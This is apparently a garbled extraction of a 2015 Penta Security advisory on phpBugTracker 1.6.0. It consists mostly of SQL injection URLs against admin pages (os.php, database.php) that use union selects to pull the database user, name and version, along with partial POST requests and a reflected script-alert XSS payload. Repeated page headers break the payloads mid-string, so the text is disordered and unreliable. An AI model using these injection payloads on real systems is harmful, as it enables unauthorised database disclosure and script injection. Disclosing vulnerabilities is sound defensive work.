/admin/os.php?op=edit&os_id=1%27+and+1=2+uni
on+select+1,user%28%29,database%28%29,version
%28%29+--+
POST /admin/os.php?op=edit&use_js=1&os_id=0
HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
phpBugTracker
1.6.0
phpBugTracker
1.6.0
phpBugTracker
1.6.0
phpBugTracker
1.6.0
phpBugTracker
1.6.0
phpBugTracker
1.6.0
phpBugTracker
1.6.0
phpBugTracker
phpBugTracker
1.6.0
phpBugTracker
phpBugTracker
1.6.0
phpBugTracker
phpBugTracker
1.6.0
Regex=<script>alert(1);</script>
/admin/database.php?op=edit&database_id=1%27+a
phpBugTracker
nd+1=2+union+select+1,user%28%29,version%28
%29
POST
/admin/database.php?op=edit&use_js=1&database_i
d=0 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
phpBugTracker
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
Copyright 2015 Penta Security Systems Inc. All rights reserved
phpBugTracker
1.6.0
phpBugTracker
phpBugTracker
1.6.0
phpBugTracker
1.6.0